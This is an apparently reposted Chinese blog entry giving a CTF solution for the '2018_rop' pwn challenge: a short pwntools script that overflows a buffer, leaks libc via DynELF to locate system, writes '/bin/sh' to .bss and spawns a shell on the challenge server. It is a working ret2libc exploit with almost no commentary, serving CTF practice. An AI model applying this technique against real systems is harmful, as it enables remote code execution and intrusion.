铁人三项(第五赛区)_2018_rop
Posted gaonuoqi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了铁人三项(第五赛区)_2018_rop相关的知识,希望对你有一定的参考价值。
利用pwntools的DynELF
from pwn import * r=remote(‘node3.buuoj.cn‘,29392) e=ELF(‘./2018_rop‘) write_plt=e.plt[‘write‘] read_plt=e.plt[‘read‘] main_addr=e.symbols[‘main‘] bss_addr=e.symbols[‘__bss_start‘] def leak(address): payload1=‘a‘*(0x88+0x4)+p32(write_plt)+p32(main_addr)+p32(0x1)+p32(address)+p32(0x4) r.sendline(payload1) leak_address=r.recv(4) return leak_address d=DynELF(leak,elf=ELF(‘./2018_rop‘)) sys_addr=d.lookup(‘system‘,‘libc‘) payload2=‘a‘*(0x88+0x4)+p32(read_plt)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload2) r.sendline(‘/bin/sh‘) payload3=‘a‘*(0x88+0x4)+p32(sys_addr)+p32(main_addr)+p32(bss_addr) r.sendline(payload3) r.interactive()
以上是关于铁人三项(第五赛区)_2018_rop的主要内容,如果未能解决你的问题,请参考以下文章